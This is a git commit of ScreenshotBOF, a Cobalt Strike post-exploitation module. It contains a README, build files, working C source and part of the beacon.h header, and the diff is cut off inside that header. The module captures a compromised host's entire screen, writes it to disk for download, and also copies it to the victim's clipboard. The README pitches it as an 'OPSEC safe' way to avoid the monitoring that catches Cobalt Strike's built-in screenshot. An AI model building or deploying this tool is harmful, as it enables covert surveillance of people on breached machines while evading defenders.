first commit
This commit is contained in:
commit
a32d082895
|
@ -0,0 +1 @@
|
|||
/.vs
|
|
@ -0,0 +1,21 @@
|
|||
# ScreenshotBOF
|
||||
|
||||
An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot saved to disk as a file.
|
||||
|
||||
## Usage
|
||||
1. import the screenshotBOF.cna script into Cobalt Strike
|
||||
2. use the command screenshot_bof
|
||||
3. Download the screenshot from the target e.g.
|
||||
```
|
||||
download screenshot.bmp
|
||||
```
|
||||
|
||||
## Notes
|
||||
- no evasion is performed, which should be fine since the WinAPIs used are not malicious
|
||||
- in memory downloading of screenshots is planned to be added
|
||||
- the filename can be changed in the source code.
|
||||
|
||||
## Why did I make this?
|
||||
Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command.
|
||||
While this behaviour provides stability, it is now well known and heavily monitored for. This BOF is meant to provide a more
|
||||
OPSEC safe version of the screenshot capability.
|
|
@ -0,0 +1,37 @@
|
|||
|
||||
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||
# Visual Studio Version 16
|
||||
VisualStudioVersion = 16.0.30517.126
|
||||
MinimumVisualStudioVersion = 10.0.40219.1
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ScreenshotBOF", "ScreenshotBOF\ScreenshotBOF.vcxproj", "{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}"
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
BOF|x64 = BOF|x64
|
||||
BOF|x86 = BOF|x86
|
||||
Debug|x64 = Debug|x64
|
||||
Debug|x86 = Debug|x86
|
||||
Release|x64 = Release|x64
|
||||
Release|x86 = Release|x86
|
||||
EndGlobalSection
|
||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||
{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.BOF|x64.ActiveCfg = BOF|x64
|
||||
{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.BOF|x64.Build.0 = BOF|x64
|
||||
{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.BOF|x86.ActiveCfg = BOF|Win32
|
||||
{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.BOF|x86.Build.0 = BOF|Win32
|
||||
{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Debug|x64.ActiveCfg = Debug|x64
|
||||
{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Debug|x64.Build.0 = Debug|x64
|
||||
{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Debug|x86.ActiveCfg = Debug|Win32
|
||||
{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Debug|x86.Build.0 = Debug|Win32
|
||||
{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Release|x64.ActiveCfg = Release|x64
|
||||
{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Release|x64.Build.0 = Release|x64
|
||||
{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Release|x86.ActiveCfg = Release|Win32
|
||||
{C04AB0F3-F7E1-4996-9CFA-D1337332EF29}.Release|x86.Build.0 = Release|Win32
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
EndGlobalSection
|
||||
GlobalSection(ExtensibilityGlobals) = postSolution
|
||||
SolutionGuid = {BB40A5A4-261A-4411-8CC0-615E484001A5}
|
||||
EndGlobalSection
|
||||
EndGlobal
|
|
@ -0,0 +1,277 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="BOF|Win32">
|
||||
<Configuration>BOF</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="BOF|x64">
|
||||
<Configuration>BOF</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<VCProjectVersion>16.0</VCProjectVersion>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<ProjectGuid>{c04ab0f3-f7e1-4996-9cfa-d1337332ef29}</ProjectGuid>
|
||||
<RootNamespace>ScreenshotBOF</RootNamespace>
|
||||
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
|
||||
<ProjectName>ScreenshotBOF</ProjectName>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Label="Configuration" Condition="'$(Configuration)|$(Platform)'=='BOF|Win32'">
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<ConfigurationType>Console</ConfigurationType>
|
||||
<EnableASAN />
|
||||
<SpectreMitigation />
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Label="Configuration" Condition="'$(Configuration)|$(Platform)'=='BOF|x64'">
|
||||
<ConfigurationType>Console</ConfigurationType>
|
||||
<!-- This is hack to skip the linking process for our BOF config -->
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<EnableASAN />
|
||||
<SpectreMitigation />
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="Shared">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='BOF|x64'">
|
||||
<ExtensionsToDeleteOnClean>$(SolutionDir)bin\$(Configuration)\$(ProjectName).x64.obj;*.cdf;*.cache;*.obj;*.obj.enc;*.ilk;*.ipdb;*.iobj;*.resources;*.tlb;*.tli;*.tlh;*.tmp;*.rsp;*.pgc;*.pgd;*.meta;*.tlog;*.manifest;*.res;*.pch;*.exp;*.idb;*.rep;*.xdc;*.pdb;*_manifest.rc;*.bsc;*.sbr;*.xml;*.metagen;*.bi;$(SolutionDir)bin\$(Configuration)\$(ProjectName).x64.o;$(ExtensionsToDeleteOnClean)</ExtensionsToDeleteOnClean>
|
||||
<CopyLocalDeploymentContent />
|
||||
<OutDir>$(SolutionDir)bin\$(Configuration)\</OutDir>
|
||||
<IntDir>intermediary\$(Configuration)\$(Platform)\</IntDir>
|
||||
<TargetName>$(ProjectName)x64</TargetName>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='BOF|Win32'">
|
||||
<ExtensionsToDeleteOnClean>$(SolutionDir)bin\$(Configuration)\$(ProjectName).x86.obj;*.cdf;*.cache;*.obj;*.obj.enc;*.ilk;*.ipdb;*.iobj;*.resources;*.tlb;*.tli;*.tlh;*.tmp;*.rsp;*.pgc;*.pgd;*.meta;*.tlog;*.manifest;*.res;*.pch;*.exp;*.idb;*.rep;*.xdc;*.pdb;*_manifest.rc;*.bsc;*.sbr;*.xml;*.metagen;*.bi;$(ExtensionsToDeleteOnClean)</ExtensionsToDeleteOnClean>
|
||||
<CopyLocalDeploymentContent />
|
||||
<OutDir>$(SolutionDir)bin\$(Configuration)\</OutDir>
|
||||
<TargetName>$(ProjectName)x32</TargetName>
|
||||
<IntDir>intermediary\$(Configuration)\x86\</IntDir>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<OutDir>$(SolutionDir)bin\$(Configuration)\</OutDir>
|
||||
<TargetName>$(ProjectName)64</TargetName>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<OutDir>$(SolutionDir)bin\$(Configuration)\</OutDir>
|
||||
<TargetName>$(ProjectName)32</TargetName>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<OutDir>$(SolutionDir)bin\$(Configuration)\</OutDir>
|
||||
<TargetName>$(ProjectName)32</TargetName>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<OutDir>$(SolutionDir)bin\$(Configuration)\</OutDir>
|
||||
<TargetName>$(ProjectName)64</TargetName>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>EnableAllWarnings</WarningLevel>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>false</ConformanceMode>
|
||||
<AdditionalOptions>
|
||||
</AdditionalOptions>
|
||||
<ExternalWarningLevel>Level1</ExternalWarningLevel>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level4</WarningLevel>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>false</ConformanceMode>
|
||||
<ExternalWarningLevel>Level1</ExternalWarningLevel>
|
||||
<AdditionalOptions>
|
||||
</AdditionalOptions>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>EnableAllWarnings</WarningLevel>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>false</ConformanceMode>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<ExternalWarningLevel>Level1</ExternalWarningLevel>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level4</WarningLevel>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>false</ConformanceMode>
|
||||
<ExternalWarningLevel>Level1</ExternalWarningLevel>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='BOF|x64'">
|
||||
<ClCompile>
|
||||
<AdditionalOptions>/c /Fo"intermediary\BOF\x64\source"</AdditionalOptions>
|
||||
<WarningLevel>
|
||||
</WarningLevel>
|
||||
<DebugInformationFormat>None</DebugInformationFormat>
|
||||
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||
<PreprocessorDefinitions>BOF;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<MinimalRebuild />
|
||||
<ExceptionHandling />
|
||||
<RuntimeLibrary />
|
||||
<FloatingPointModel />
|
||||
<TreatWChar_tAsBuiltInType />
|
||||
<ForceConformanceInForLoopScope />
|
||||
<RemoveUnreferencedCodeData />
|
||||
<ModuleOutputFile />
|
||||
<SuppressStartupBanner />
|
||||
<CallingConvention />
|
||||
<AssemblerOutput />
|
||||
<AssemblerListingLocation />
|
||||
<UseFullPaths />
|
||||
<ErrorReporting />
|
||||
<PrecompiledHeaderOutputFile />
|
||||
<DiagnosticsFormat />
|
||||
<Optimization>
|
||||
</Optimization>
|
||||
<ProgramDataBaseFileName />
|
||||
<TreatWarningAsError />
|
||||
<XMLDocumentationFileName />
|
||||
<FavorSizeOrSpeed>
|
||||
</FavorSizeOrSpeed>
|
||||
<ExternalWarningLevel>Level1</ExternalWarningLevel>
|
||||
</ClCompile>
|
||||
<PostBuildEvent>
|
||||
<Command>xcopy /y "$(SolutionDir)$(ProjectName)\intermediary\$(Configuration)\$(Platform)\source.obj" "$(SolutionDir)bin\$(Configuration)\$(ProjectName).x64.o*";
|
||||
powershell -ExecutionPolicy Unrestricted -command "& { . '$(SolutionDir)$(ProjectName)\resources\strip_bof.ps1'; strip-bof -Path '$(SolutionDir)bin\$(Configuration)\$(ProjectName).x64.obj' }"</Command>
|
||||
</PostBuildEvent>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='BOF|Win32'">
|
||||
<ClCompile>
|
||||
<AdditionalOptions>/c /Fo"intermediary\BOF\x86\source"</AdditionalOptions>
|
||||
<WarningLevel>
|
||||
</WarningLevel>
|
||||
<DebugInformationFormat>None</DebugInformationFormat>
|
||||
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||
<PreprocessorDefinitions>BOF;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<MinimalRebuild />
|
||||
<ExceptionHandling />
|
||||
<RuntimeLibrary />
|
||||
<FloatingPointModel />
|
||||
<TreatWChar_tAsBuiltInType />
|
||||
<ForceConformanceInForLoopScope />
|
||||
<RemoveUnreferencedCodeData />
|
||||
<ModuleOutputFile />
|
||||
<SuppressStartupBanner />
|
||||
<CallingConvention />
|
||||
<AssemblerOutput />
|
||||
<AssemblerListingLocation />
|
||||
<UseFullPaths />
|
||||
<ErrorReporting />
|
||||
<PrecompiledHeaderOutputFile />
|
||||
<DiagnosticsFormat />
|
||||
<Optimization />
|
||||
<ProgramDataBaseFileName />
|
||||
<TreatWarningAsError />
|
||||
<XMLDocumentationFileName />
|
||||
<ExternalWarningLevel>Level1</ExternalWarningLevel>
|
||||
</ClCompile>
|
||||
<PostBuildEvent>
|
||||
<Command>xcopy /y "$(SolutionDir)$(ProjectName)\intermediary\$(Configuration)\x86\source.obj" "$(SolutionDir)bin\$(Configuration)\$(ProjectName).x86.o*";
|
||||
powershell -ExecutionPolicy Unrestricted -command "& { . '$(SolutionDir)$(ProjectName)\resources\strip_bof.ps1'; strip-bof -Path '$(SolutionDir)bin\$(Configuration)\$(ProjectName).x86.obj' }"
|
||||
</Command>
|
||||
</PostBuildEvent>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="Source.cpp" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="beacon.h" />
|
||||
<ClInclude Include="bofdefs.h" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Text Include="resources\strip_bof.ps1" Visible="false" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
</Project>
|
|
@ -0,0 +1,32 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup>
|
||||
<Filter Include="Header Files">
|
||||
<UniqueIdentifier>{f23d5754-25e5-46a9-b783-8685f48d2291}</UniqueIdentifier>
|
||||
</Filter>
|
||||
<Filter Include="Source Files">
|
||||
<UniqueIdentifier>{72263c50-a87a-4d99-9746-3def65c61180}</UniqueIdentifier>
|
||||
</Filter>
|
||||
<Filter Include="Resources">
|
||||
<UniqueIdentifier>{999efb6a-e35d-49fb-bf81-1ebab5077dd0}</UniqueIdentifier>
|
||||
</Filter>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="Source.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="beacon.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="bofdefs.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Text Include="resources\strip_bof.ps1">
|
||||
<Filter>Resources</Filter>
|
||||
</Text>
|
||||
</ItemGroup>
|
||||
</Project>
|
|
@ -0,0 +1,4 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<PropertyGroup />
|
||||
</Project>
|
|
@ -0,0 +1,151 @@
|
|||
#include <windows.h>
|
||||
#include <stdio.h>
|
||||
#include "bofdefs.h"
|
||||
#pragma comment(lib, "User32.lib")
|
||||
#pragma comment(lib, "Gdi32.lib")
|
||||
|
||||
|
||||
|
||||
#pragma region error_handling
|
||||
#define print_error(msg, hr) _print_error(__FUNCTION__, __LINE__, msg, hr)
|
||||
BOOL _print_error(char* func, int line, char* msg, HRESULT hr) {
|
||||
#ifdef BOF
|
||||
BeaconPrintf(CALLBACK_ERROR, "(%s at %d): %s 0x%08lx", func, line, msg, hr);
|
||||
#else
|
||||
printf("[-] (%s at %d): %s 0x%08lx", func, line, msg, hr);
|
||||
#endif // BOF
|
||||
|
||||
return FALSE;
|
||||
}
|
||||
#pragma endregion
|
||||
|
||||
|
||||
BOOL SaveHBITMAPToFile(HBITMAP hBitmap, LPCTSTR lpszFileName)
|
||||
{
|
||||
HDC hDC;
|
||||
int iBits;
|
||||
WORD wBitCount;
|
||||
DWORD dwPaletteSize = 0, dwBmBitsSize = 0, dwDIBSize = 0, dwWritten = 0;
|
||||
BITMAP Bitmap0;
|
||||
BITMAPFILEHEADER bmfHdr;
|
||||
BITMAPINFOHEADER bi;
|
||||
LPBITMAPINFOHEADER lpbi;
|
||||
HANDLE fh, hDib, hPal, hOldPal2 = NULL;
|
||||
hDC = CreateDC(TEXT("DISPLAY"), NULL, NULL, NULL);
|
||||
iBits = GetDeviceCaps(hDC, BITSPIXEL) * GetDeviceCaps(hDC, PLANES);
|
||||
DeleteDC(hDC);
|
||||
if (iBits <= 1)
|
||||
wBitCount = 1;
|
||||
else if (iBits <= 4)
|
||||
wBitCount = 4;
|
||||
else if (iBits <= 8)
|
||||
wBitCount = 8;
|
||||
else
|
||||
wBitCount = 24;
|
||||
GetObject(hBitmap, sizeof(Bitmap0), (LPSTR)&Bitmap0);
|
||||
bi.biSize = sizeof(BITMAPINFOHEADER);
|
||||
bi.biWidth = Bitmap0.bmWidth;
|
||||
bi.biHeight = -Bitmap0.bmHeight;
|
||||
bi.biPlanes = 1;
|
||||
bi.biBitCount = wBitCount;
|
||||
bi.biCompression = BI_RGB;
|
||||
bi.biSizeImage = 0;
|
||||
bi.biXPelsPerMeter = 0;
|
||||
bi.biYPelsPerMeter = 0;
|
||||
bi.biClrImportant = 0;
|
||||
bi.biClrUsed = 256;
|
||||
dwBmBitsSize = ((Bitmap0.bmWidth * wBitCount + 31) & ~31) / 8
|
||||
* Bitmap0.bmHeight;
|
||||
hDib = GlobalAlloc(GHND, dwBmBitsSize + dwPaletteSize + sizeof(BITMAPINFOHEADER));
|
||||
lpbi = (LPBITMAPINFOHEADER)GlobalLock(hDib);
|
||||
*lpbi = bi;
|
||||
|
||||
hPal = GetStockObject(DEFAULT_PALETTE);
|
||||
if (hPal)
|
||||
{
|
||||
hDC = GetDC(NULL);
|
||||
hOldPal2 = SelectPalette(hDC, (HPALETTE)hPal, FALSE);
|
||||
RealizePalette(hDC);
|
||||
}
|
||||
|
||||
|
||||
GetDIBits(hDC, hBitmap, 0, (UINT)Bitmap0.bmHeight, (LPSTR)lpbi + sizeof(BITMAPINFOHEADER)
|
||||
+ dwPaletteSize, (BITMAPINFO*)lpbi, DIB_RGB_COLORS);
|
||||
|
||||
if (hOldPal2)
|
||||
{
|
||||
SelectPalette(hDC, (HPALETTE)hOldPal2, TRUE);
|
||||
RealizePalette(hDC);
|
||||
ReleaseDC(NULL, hDC);
|
||||
}
|
||||
|
||||
fh = CreateFile(lpszFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS,
|
||||
FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN, NULL);
|
||||
|
||||
if (fh == INVALID_HANDLE_VALUE)
|
||||
return FALSE;
|
||||
|
||||
bmfHdr.bfType = 0x4D42; // "BM"
|
||||
dwDIBSize = sizeof(BITMAPFILEHEADER) + sizeof(BITMAPINFOHEADER) + dwPaletteSize + dwBmBitsSize;
|
||||
bmfHdr.bfSize = dwDIBSize;
|
||||
bmfHdr.bfReserved1 = 0;
|
||||
bmfHdr.bfReserved2 = 0;
|
||||
bmfHdr.bfOffBits = (DWORD)sizeof(BITMAPFILEHEADER) + (DWORD)sizeof(BITMAPINFOHEADER) + dwPaletteSize;
|
||||
|
||||
WriteFile(fh, (LPSTR)&bmfHdr, sizeof(BITMAPFILEHEADER), &dwWritten, NULL);
|
||||
|
||||
WriteFile(fh, (LPSTR)lpbi, dwDIBSize, &dwWritten, NULL);
|
||||
GlobalUnlock(hDib);
|
||||
GlobalFree(hDib);
|
||||
CloseHandle(fh);
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
#ifdef BOF
|
||||
void go(char* buff, int len) {
|
||||
BeaconPrintf(0x0, "[*] Tasked beacon to printscreen and save to disk");
|
||||
int x1, y1, x2, y2, w, h;
|
||||
// get screen dimensions
|
||||
x1 = GetSystemMetrics(SM_XVIRTUALSCREEN);
|
||||
y1 = GetSystemMetrics(SM_YVIRTUALSCREEN);
|
||||
x2 = GetSystemMetrics(SM_CXVIRTUALSCREEN);
|
||||
y2 = GetSystemMetrics(SM_CYVIRTUALSCREEN);
|
||||
w = x2 - x1;
|
||||
h = y2 - y1;
|
||||
|
||||
// copy screen to bitmap
|
||||
HDC hScreen = GetDC(NULL);
|
||||
HDC hDC = CreateCompatibleDC(hScreen);
|
||||
HBITMAP hBitmap = CreateCompatibleBitmap(hScreen, w, h);
|
||||
HGDIOBJ old_obj = SelectObject(hDC, hBitmap);
|
||||
BOOL bRet = BitBlt(hDC, 0, 0, w, h, hScreen, x1, y1, SRCCOPY);
|
||||
|
||||
//I was going to pull from the clipboard but then realized it
|
||||
//was more trouble than it was worth, so I just saved it to a file. ~ CodeX
|
||||
|
||||
// save bitmap to clipboard
|
||||
OpenClipboard(NULL);
|
||||
EmptyClipboard();
|
||||
SetClipboardData(CF_BITMAP, hBitmap);
|
||||
CloseClipboard();
|
||||
|
||||
BeaconPrintf(0x0, "[+] PrintScreen saved to bitmap...");
|
||||
LPCSTR filename = "screenshot.bmp";
|
||||
SaveHBITMAPToFile(hBitmap, (LPCTSTR)filename);
|
||||
|
||||
BeaconPrintf(0x0, "[+] Printscreen bitmap saved to screenshot.bmp");
|
||||
// clean up
|
||||
SelectObject(hDC, old_obj);
|
||||
DeleteDC(hDC);
|
||||
ReleaseDC(NULL, hScreen);
|
||||
DeleteObject(hBitmap);
|
||||
}
|
||||
|
||||
|
||||
#else
|
||||
|
||||
void main(int argc, char* argv[]) {
|
||||
|
||||
}
|
||||
|
||||
#endif
|
|
@ -0,0 +1,63 @@
|
|||
#pragma once
|
||||
|
||||
/*
|
||||
* Beacon Object Files (BOF)
|
||||
* -------------------------
|
||||
* A Beacon Object File is a light-weight post exploitation tool that runs
|
||||
* with Beacon's inline-execute command.
|
||||
*
|
||||
* Cobalt Strike 4.1.
|
||||
*/
|
||||
|
||||
/* data API */
|
||||
typedef struct {
|
||||
char * original; /* the original buffer [so we can free it] */
|
||||
char * buffer; /* current pointer into our buffer */
|
||||
int length; /* remaining length of data */
|
||||
int size; /* total size of this buffer */
|
||||
} datap;
|
||||
|
||||
DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size);
|
||||
DECLSPEC_IMPORT int BeaconDataInt(datap * parser);
|
||||
DECLSPEC_IMPORT short BeaconDataShort(datap * parser);
|
||||
DECLSPEC_IMPORT int BeaconDataLength(datap * parser);
|
||||
DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size);
|
||||
|
||||
/* format API */
|
||||
typedef struct {
|
||||
char * original; /* the original buffer [so we can free it] */
|
||||
char * buffer; /* current pointer into our buffer */
|
||||
int length; /* remaining length of data */
|
||||
int size; /* total size of this buffer */
|
||||
} formatp;
|
||||
|
||||
DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz);
|
||||
DECLSPEC_IMPORT void BeaconFormatReset(formatp * format);
|
||||
DECLSPEC_IMPORT void BeaconFormatFree(formatp * format);
|
||||
DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len);
|
||||
DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...);
|
||||
DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size);
|
||||
DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value);
|
||||
|
||||
/* Output Functions */
|
||||
#define CALLBACK_OUTPUT 0x0
|
||||
#define CALLBACK_OUTPUT_OEM 0x1e
|
||||
#define CALLBACK_ERROR 0x0d
|
||||
